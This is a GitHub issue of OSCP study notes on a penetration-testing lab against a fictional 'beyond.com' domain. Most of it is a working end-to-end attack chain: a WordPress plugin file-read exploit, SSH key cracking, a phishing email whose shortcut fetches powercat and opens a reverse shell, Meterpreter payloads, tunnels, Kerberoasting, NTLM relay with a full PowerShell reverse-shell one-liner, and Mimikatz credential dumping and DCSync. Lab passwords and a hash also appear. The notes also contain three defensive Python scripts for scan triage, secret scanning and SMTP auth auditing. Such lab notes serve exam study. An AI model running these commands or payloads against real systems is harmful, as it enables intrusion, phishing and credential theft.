WDavid404 / OSCP


24. Assembling the Pieces #25

Open WDavid404 opened 7 months ago

WDavid404 commented 7 months ago

24.1. Enumerating the Public Network

Environment: there are two servers (MAILSRV1 and WEBSRV1) on the public network, reachable from our Kali machine.

Port scan the servers one by one.

```bash
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
## -oN to create an output file containing the scan results.
## -sC to use Nmap's default scripts
```

check hMailServer on CVE ==> no useful info

Next, let's enumerate the IIS web server. First, we'll browse the web page. Let's try to identify directories and files by using gobuster

```bash
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
```

==> no useful info

WDavid404 commented 7 months ago

Tools:

WDavid404 commented 7 months ago

nmap for MAILSRV1

```text
nmap -sV -sC -o mailsrv1.txt 192.168.188.242

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:01 EST
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE    SERVICE       VERSION
25/tcp   open     smtp          hMailServer smtpd ==> hMailServer!
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open     http          Microsoft IIS httpd 10.0  ==> Noted!
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
110/tcp  open     pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
143/tcp  open     imap          hMailServer imapd
|_imap-capabilities: QUOTA ACL RIGHTS=texkA0001 IMAP4rev1 IDLE completed CAPABILITY IMAP4 OK CHILDREN NAMESPACE SORT
445/tcp  open     microsoft-ds?
587/tcp  open     smtp          hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
2160/tcp filtered apc-2160
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-29T12:03:01
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.29 seconds
```

==> Search hMailserver on CVE https://www.cvedetails.com/vulnerability-list/vendor_id-8442/product_id-14780/Hmailserver-Hmailserver.html

Nmap for WEBSRV1

```text
nmap -sV -sC -o websvr1.txt 192.168.188.244

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:07 EST
Nmap scan report for 192.168.188.244
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_  256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp   open     http    Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.0.2
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.188.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1121/tcp filtered rmpp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
```
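As an added example (not part of these notes or of the lab material), the following Python script parses nmap `-oN` output like the two scans above and turns the NSE script lines into the findings a defender would act on: SMB signing enabled but not required (NTLM relay exposure), HTTP TRACE enabled, and an SMTP service that advertises AUTH LOGIN without STARTTLS. The embedded sample is the MAILSRV1 scan from above, trimmed to the lines the parser uses; `HostReport`, `parse_nmap_normal` and `triage` are names chosen for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the MAILSRV1 scan shown above, trimmed to the lines the parser uses.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
PORT     STATE    SERVICE       VERSION
25/tcp   open     smtp          hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
110/tcp  open     pop3          hMailServer pop3d
445/tcp  open     microsoft-ds?
2160/tcp filtered apc-2160

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class HostReport:
    address: str = ""
    open_ports: dict = field(default_factory=dict)  # "25/tcp" -> (service, version)
    findings: list = field(default_factory=list)    # (port or "host", message)


def parse_nmap_normal(text):
    """Parse nmap -oN text. NSE script lines ('|' prefixed) are attached to the
    port line they follow, or to "host" once 'Host script results:' is seen."""
    report = HostReport()
    current = None   # key that the following '|' lines belong to
    scripts = {}     # key -> list of script output lines (prefix stripped)
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            report.address = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = f"{port}/{proto}"
            if state == "open":
                report.open_ports[current] = (service, version)
            continue
        if line.startswith("Host script results:"):
            current = "host"
            continue
        if line.startswith("|") and current is not None:
            scripts.setdefault(current, []).append(line.lstrip("|_ ").strip())
    report.findings = triage(scripts)
    return report


def triage(scripts):
    """Turn raw NSE script output into defender-facing findings."""
    findings = []
    for key, lines in scripts.items():
        text = " ".join(lines)
        if "Message signing enabled but not required" in text:
            findings.append((key, "SMB signing not required: host is exposed to NTLM relay; "
                                  "require signing via policy"))
        if "Potentially risky methods" in text and "TRACE" in text:
            findings.append((key, "HTTP TRACE enabled: disable it on the web server"))
        # smtp-commands lists the EHLO capabilities; STARTTLS would appear there if offered
        if "AUTH LOGIN" in text and "STARTTLS" not in text:
            findings.append((key, "SMTP offers AUTH LOGIN without STARTTLS: credentials "
                                  "cross the network base64-encoded, not encrypted"))
    return findings


if __name__ == "__main__":
    r = parse_nmap_normal(SAMPLE_SCAN)
    print(r.address, sorted(r.open_ports))
    for key, msg in r.findings:
        print(f"[{key}] {msg}")
```

Run it against a saved `-oN` file by reading the file into `parse_nmap_normal`; the same triage applies to the WEBSRV1 scan, which produces no findings of these three kinds.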

==> View page source ---> it uses WordPress

```bash
wpscan --url http://192.168.188.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
cat websrv1_wpscan | grep -i "The version is out of date" -B4
```

Use searchsploit to look up each of these plugins in turn; only Duplicator and Elementor have usable exploit modules.

Use searchsploit -x <module name> to view the details; the Duplicator exploit is the more usable one. Use 50420.py:

```bash
searchsploit -m 50420.py
python3 50420.py http://192.168.188.244 /etc/passwd
# ==> works, and reveals two users: daniela and marcus

# Get the user's id_rsa (/home/<user>/.ssh/id_rsa)
python3 50420.py http://192.168.188.244 /home/daniela/.ssh/id_rsa
# ==> copy it into a local file id_rsa (don't forget to set permissions: chmod 600 id_rsa)
```

Use the id_rsa file to try to SSH into websrv1:

```bash
ssh -i ./id_rsa daniela@192.168.188.244
Enter passphrase for key './id_rsa': 
```

==> Crack the SSH passphrase. https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625

```bash
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
# cracked result: tequieromucho
```

Using the cracked passphrase, the SSH login succeeds!

Inside WEBSRV1

daniela@websrv1:~$ ip a  ==> this server is not connected to the internal network

Inside WEBSRV1, use the linPEAS.sh tool to search automatically (linPEAS.sh: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).

On WEBSRV1, download it from Kali with daniela@websrv1:~$ wget -qc http://192.168.45.204:9000/linpeas.sh, then:

```bash
daniela@websrv1:~$ chmod a+x ./linpeas.sh
daniela@websrv1:~$ ./linpeas.sh
```

Pay attention to the following pieces of information in its output:

Using the "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" information above, perform privilege escalation. After obtaining root, let's search the Git repository for sensitive information first.

```text
root@websrv1:/home/daniela# cd /srv/www/wordpress/

root@websrv1:/srv/www/wordpress# git status
HEAD detached at 612ff57
nothing to commit, working tree clean

root@websrv1:/srv/www/wordpress# git log
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD -> master)
Author: root <root@websrv1>
Date:   Tue Sep 27 14:26:15 2022 +0000

    Removed staging script and internal network access

commit f82147bb0877fa6b5d8e80cf33da7b8f757d11dd
Author: root <root@websrv1>
Date:   Tue Sep 27 14:24:28 2022 +0000

    initial commit

root@websrv1:/srv/www/wordpress# git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
```

==> Collected jon's credentials.
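The git history finding above is worth generalizing: a secret that a later commit "removed" is still recoverable from history, so a repository audit has to scan removed lines as well as added ones. The following Python scanner is an added example (not part of these notes or the lab) that walks `git log -p`-style unified diff text and flags credential-looking lines in both directions, masking the value in its report. The diff embedded below is constructed for the example; every file name, account and value in it is invented.

```python
import re
from dataclasses import dataclass

# Constructed sample: a unified diff shaped like a "removed the staging script" commit.
# All names and values are invented for this example; nothing here is from the lab.
SAMPLE_DIFF = """\
diff --git a/staging.sh b/staging.sh
deleted file mode 100755
--- a/staging.sh
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/bin/bash
-# sync the site to the staging host on the internal network
-STAGING_USER=svc_staging
-STAGING_PASS='Example-Passw0rd!'
-cat > /tmp/deploy_key <<'EOF'
------BEGIN OPENSSH PRIVATE KEY-----
-(key material omitted in this constructed sample)
-EOF
diff --git a/wp-config.php b/wp-config.php
--- a/wp-config.php
+++ b/wp-config.php
@@ -20,3 +20,3 @@
 define('DB_NAME', 'wordpress');
-define('DB_PASSWORD', 'old-db-secret');
+define('DB_PASSWORD', getenv('WP_DB_PASSWORD'));
"""

# a credential keyword followed by =, : or , and a value of at least 6 non-space characters
ASSIGN_RE = re.compile(
    r"(?i)(?:pass(?:word|wd)?|pwd|secret|token)['\"]?\s*[=:,]\s*['\"]?(?P<value>[^'\"\s]{6,})")
PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
URL_CRED_RE = re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:(?P<value>[^@\s]+)@")


@dataclass
class Finding:
    path: str
    change: str   # "added" or "removed"
    kind: str
    masked: str   # never the secret itself


def looks_like_indirection(value):
    """Values that are lookups or placeholders rather than literal secrets."""
    return (value.startswith(("$", "%", "<", "{"))
            or "(" in value                            # getenv(...), os.environ.get(...)
            or (value.isupper() and "_" in value))     # an env var name such as DB_PASS


def mask(value):
    return value[:2] + "*" * (len(value) - 2)


def scan_line(content):
    """Return (kind, masked) for the first secret-looking thing on a line, else None."""
    for m in ASSIGN_RE.finditer(content):
        if not looks_like_indirection(m.group("value")):
            return "password assignment", mask(m.group("value"))
    m = PRIVATE_KEY_RE.search(content)
    if m:
        return "private key", m.group(0)
    m = URL_CRED_RE.search(content)
    if m:
        return "credential in URL", mask(m.group("value"))
    return None


def scan_diff(diff_text):
    """Walk a unified diff; inspect every +/- line inside hunks, removed lines included."""
    findings, path, in_hunk = [], None, False
    for line in diff_text.splitlines():
        if line.startswith("diff --git "):
            path, in_hunk = line.split()[-1][2:], False   # "b/<path>" -> "<path>"
        elif line.startswith("@@"):
            in_hunk = True
        elif in_hunk and path is not None and line[:1] in ("+", "-"):
            hit = scan_line(line[1:])
            if hit:
                findings.append(Finding(path, "added" if line[0] == "+" else "removed", *hit))
    return findings


if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"{f.path}: {f.change} line contains {f.kind}: {f.masked}")
```

Feed it the output of `git log -p --all` to cover every branch; the hardened `getenv(...)` line is deliberately not reported, which is the false positive a naive keyword match would raise.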

Try the user list and password list collected so far against MAILSRV1:

```bash
crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success
```

==> MAILSRV1 is a domain-joined machine and we have identified a valid set of domain credentials for jon.

This provides us with two options:

  1. We can further enumerate SMB on MAILSRV1 and check for sensitive information on accessible shares.
  2. We can prepare a malicious attachment and send a phishing email as john to daniela and marcus.

Try the first option: crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares ---> no useful info.

So we have to go with option 2: send a phishing email as john to daniela and marcus.

Phishing email

  1. Prepare a WebDAV server:

```bash
kali@kali:~$ mkdir /home/kali/beyond/webdav
kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
```

Lesson learned the hard way: the WebDAV port must be 80, otherwise the later steps will not succeed!

  2. Log in to a Windows PC to create the Windows Library file (config.Library-ms) and the shortcut file.
Connect to WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.

The config.Library-ms content (the XML element tags are missing from this copy; only the element values survive, in document order):

```text
<?xml version="1.0" encoding="UTF-8"?>
@windows.storage.dll,-34582
6
true
imageres.dll,-1003
{7d49d726-3c21-4f05-99aa-fdc2c9474656}
true
false
http://192.168.45.204   ==> !! Note the IP and port here
```

Note: after config.Library-ms is saved to Kali its contents change; be sure to restore them manually.

Create a new shortcut on the Windows PC desktop (the name, e.g. "configuration", can be anything).
Set the shortcut target to the following, then copy the shortcut into the webdav directory on Kali (double-clicking the config file also points into the webdav directory):

```powershell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
```

--> This will download powercat.ps1 from Kali's port 9000 (the http.server port) and execute it to send a reverse shell to Kali's port 4444.

Prepare on Kali:
- place powercat.ps1 in the webdav directory (/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
  _Lesson learned the hard way: the powercat.ps1 downloaded from the internet doesn't work well; search for it inside Kali instead: find / -name powercat.ps1 2>/dev/null_
- in the webdav directory: python3 -m http.server 9000
- nc -lvp 4444
- a body.txt file with any content.

Then:

```bash
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
```

--server specifies the address of MAILSRV1.

-ap enables password authentication (without -ap it does not work: nc receives no reverse shell).

```text
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<-  220 MAILSRV1 ESMTP
 -> EHLO kali
<-  250-MAILSRV1
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> AUTH LOGIN
<-  334 VXNlcm5hbWU6
 -> am9obg==
<-  334 UGFzc3dvcmQ6
 -> ZHFzVHdUcFpQbiNuTA==
<-  235 authenticated.
 -> MAIL FROM:john@beyond.com
<-  250 OK
 -> RCPT TO:marcus@beyond.com
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> 36 lines sent
<-  250 Queued (1.088 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.
```
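The exchange above also shows what MAILSRV1's mail service exposes: the EHLO reply advertises AUTH LOGIN and no STARTTLS, so the 334/base64 round trip carries the username and password in an encoding, not encryption, and anyone who can capture port 25 traffic can read them. As an added example (not part of these notes or the lab), the Python audit below parses a swaks-style transcript, records whether STARTTLS was offered or negotiated, and recovers the AUTH LOGIN (or AUTH PLAIN) username from the exchange, reporting the password only by length. The sample transcript is the one above re-typed as constructed input; `parse_transcript` and `audit_smtp_auth` are names chosen for this example. The defender's fix is to require TLS before AUTH is accepted.

```python
import base64

# Constructed sample: the swaks exchange shown above, one protocol line per entry
# ('->' client to server, '<-' server to client).
SAMPLE_TRANSCRIPT = """\
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<-  220 MAILSRV1 ESMTP
 -> EHLO kali
<-  250-MAILSRV1
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> AUTH LOGIN
<-  334 VXNlcm5hbWU6
 -> am9obg==
<-  334 UGFzc3dvcmQ6
 -> ZHFzVHdUcFpQbiNuTA==
<-  235 authenticated.
 -> MAIL FROM:john@beyond.com
<-  250 OK
"""


def parse_transcript(text):
    """Yield (direction, line) pairs: 'C' for client lines, 'S' for server lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("->"):
            yield "C", line[2:].strip()
        elif line.startswith("<-"):
            yield "S", line[2:].strip()


def b64(s):
    return base64.b64decode(s).decode("utf-8", "replace")


def audit_smtp_auth(text):
    msgs = list(parse_transcript(text))
    # EHLO capabilities are the 250 lines: "250-" continues the list, "250 " ends it
    caps = [m[4:].strip().upper() for d, m in msgs if d == "S" and m.startswith("250")]
    result = {
        "starttls_offered": any(c.startswith("STARTTLS") for c in caps),
        "tls_started": any(d == "C" and m.upper() == "STARTTLS" for d, m in msgs),
        "auth": None, "username": None, "password_length": 0,
    }
    for i, (d, m) in enumerate(msgs):
        if d != "C" or not m.upper().startswith("AUTH "):
            continue
        parts = m.split()
        mech = parts[1].upper()
        if mech == "LOGIN":
            # server prompts "Username:" then "Password:" (base64); client answers each in base64
            answers = [a for dd, a in msgs[i + 1:i + 5] if dd == "C"][:2]
            if len(answers) == 2:
                result.update(auth="LOGIN", username=b64(answers[0]),
                              password_length=len(b64(answers[1])))
        elif mech == "PLAIN":
            # initial response (or the next client line) is base64("\0user\0pass")
            blob = parts[2] if len(parts) > 2 else next(
                (a for dd, a in msgs[i + 1:i + 2] if dd == "C"), "")
            fields = b64(blob).split("\0")
            if len(fields) == 3:
                result.update(auth="PLAIN", username=fields[1], password_length=len(fields[2]))
        break
    # the exposure that matters: a password sent before TLS was negotiated
    result["cleartext_auth"] = result["auth"] is not None and not result["tls_started"]
    return result


if __name__ == "__main__":
    for k, v in audit_smtp_auth(SAMPLE_TRANSCRIPT).items():
        print(f"{k}: {v}")
```

The same parser works on a transcript where the client issues STARTTLS before AUTH; in that case `cleartext_auth` is false even though the mechanism is still LOGIN, which is the configuration to enforce on the server side.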


nc receives a reverse shell from an internal PC (CLIENTWK1, IP 172.16.74.243).

### scan CLIENTWK1 by winPEAS
Prepare a winPEAS.exe on Kali (download from https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b --> take winPEASx64.exe).

```powershell
PS C:\Windows\System32\WindowsPowerShell\v1.0> cd C:\Users\marcus
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/winPEASx64.exe -Outfile winPEAS.exe
PS C:\Users\marcus> .\winPEAS.exe
...
```

Check the following information in its output:
- AV Information (whether any AV is active)
- Network Ifaces and known hosts
- DNS cached

### scan CLIENTWK1 by Sharphound
On the Kali machine: cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
On CLIENTWK1:

```powershell
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/SharpHound.ps1 -Outfile SharpHound.ps1
PS C:\Users\marcus> powershell -ep bypass
PS C:\Users\marcus> . .\SharpHound.ps1
PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All
```

Analyzing the results gives the following info:
1. 
![image](https://github.com/WDavid404/OSCP/assets/137129330/3706e113-d721-49bf-a395-67841f12f4a9)
2. The SPN for daniela is http/internalsrv1.beyond.com
3. A domain administrator: beccy, and beccy has an active session on MAILSRV1

Then, set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec in order to identify accessible services, open ports, and SMB settings.

```bash
kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=443 -f exe -o met.exe
```

Start a multi/handler listener with the corresponding settings in Metasploit.

```text
kali@kali:~/beyond$ sudo msfconsole -q

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.45.204
LHOST => 192.168.119.5

msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443

msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
```

ExitOnSession false specifies that the listener stays active for new sessions without the need to restart it for every incoming session.


On CLIENTWK1:

```powershell
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\marcus> .\met.exe
```


In Metasploit, a new session should appear:
`[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400`
Once session 1 is opened, we can use multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy to access the internal network.

```text
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
..
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 2.
```


Confirm the SOCKS5 configuration is as follows:

```text
kali@kali:~/beyond$ cat /etc/proxychains4.conf
...
socks5 127.0.0.1 1080
```

Scan the internal network machines with crackmapexec:
`kali@kali:~/beyond$ proxychains -q crackmapexec smb 172.16.74.240-241 172.16.74.244 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares`
Results:
1. john doesn't have actionable or interesting permissions on any of the discovered shares
2. MAILSRV1 and INTERNALSRV1 have SMB signing set to False --> Without this security mechanism enabled, we can potentially perform relay attacks if we can force an authentication request.

Scan the internal network machines with nmap (note: only -sT can be used):
`kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.74.240 172.16.74.241 172.16.74.243`
==> 172.16.74.241 has ports 80 and 443 open

Use Chisel to reach the web server on port 80 of 172.16.74.241.
Use Chisel in server mode to receive incoming connections on port 8080.

Download chisel into the current directory (https://github.com/jpillora/chisel/releases/tag/v1.9.1; get the windows amd64 build and the linux build). For the Linux chisel:

```bash
kali@kali:~/beyond$ chmod a+x chisel
kali@kali:~/beyond$ ./chisel server -p 8080 --reverse
```


Upload the Windows chisel.exe to CLIENTWK1 using Meterpreter's upload command.

```text
msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload chisel.exe C:\Users\marcus\chisel.exe
```

Now, we can enter shell and utilize Chisel in client mode to connect back to our Kali machine on port 8080.
`C:\Users\marcus> chisel.exe client 192.168.45.204:8080 R:80:172.16.74.241:80`
Note: stop the WebDAV server on Kali, because it is occupying port 80.

This way, a browser on Kali can open 172.16.74.241's web page via 127.0.0.1.
To access http://127.0.0.1/wordpress/wp-admin, the following config must be modified:

```text
kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
...
127.0.0.1 internalsrv1.beyond.com   <--- this one
...
```



On the http://127.0.0.1/wordpress/wp-admin page, we can log in with daniela's credentials.

### Obtain daniela's credentials
`kali@kali:~/beyond$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john`
--> obtain daniela's hash
Crack it to get daniela's password: DANIelaRO123
`kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force`

Log in to http://127.0.0.1/wordpress/wp-admin with daniela:DANIelaRO123.
Go to the WordPress plugins page.
Click "manage" on "Backup Migration".
WDavid404 commented 7 months ago

Relay attack to MAILSRV1

  1. Start the following command on Kali:

```bash
kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.188.242 -c "powershell -enc <base64 of the one-liner below>"
```

The one-line command that the -enc value corresponds to is:

```powershell
$client = New-Object System.Net.Sockets.TCPClient("192.168.45.204",4448);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

  2. Start nc -vlpn 4448 on Kali and wait for the reverse shell.

  3. On the WordPress Backup Migration plugin page, enter //192.168.45.204/test (note: the test directory does not need to exist on Kali), then click the save button.

---> nc -vlpn 4448 then gets a shell on MAILSRV1.

Inside MAILSRV1

```powershell
PS C:\Windows\system32> cd C:\Users\Administrator
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\Administrator> .\met.exe
```

In Kali Metasploit, we should receive a new incoming session.

```text
[*] Sending stage (200774 bytes) to 192.168.50.242
[*] Meterpreter session 2 opened (192.168.119.5:443 -> 192.168.50.242:50814)

msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator> powershell
```

Next, we'll download the current Mimikatz version on Kali and serve it via our Python3 web server on port 8000. On MAILSRV1, we'll download Mimikatz with iwr and launch it.
Mimikatz location on Kali: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe (version: mimikatz 2.2.0 (x64) #19041). ⚠️ Don't download mimikatz from GitHub: sekurlsa::logonpasswords then fails with ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

```powershell
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
```

Note: if you are told that the iwr command is not recognized, check whether PowerShell has been started; iwr is a PowerShell command.

```text
PS C:\Users\Administrator> .\mimikatz.exe

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
```

==> obtain beccy's NTLM hash and password.

Note:
Running mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator on MAILSRV1 returns nothing
--> because daniela, the account currently logged in to MAILSRV1, is not a domain administrator.

Login to the DC

```bash
kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.74.240
```

After getting onto the DC, transfer mimikatz via iwr (better to transfer met.exe first and then operate from Metasploit):

```text
powershell
iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator
```

For fun, `lsadump::dcsync /domain:beyond.com /user:Administrator /all` will dump all domain users' NTLM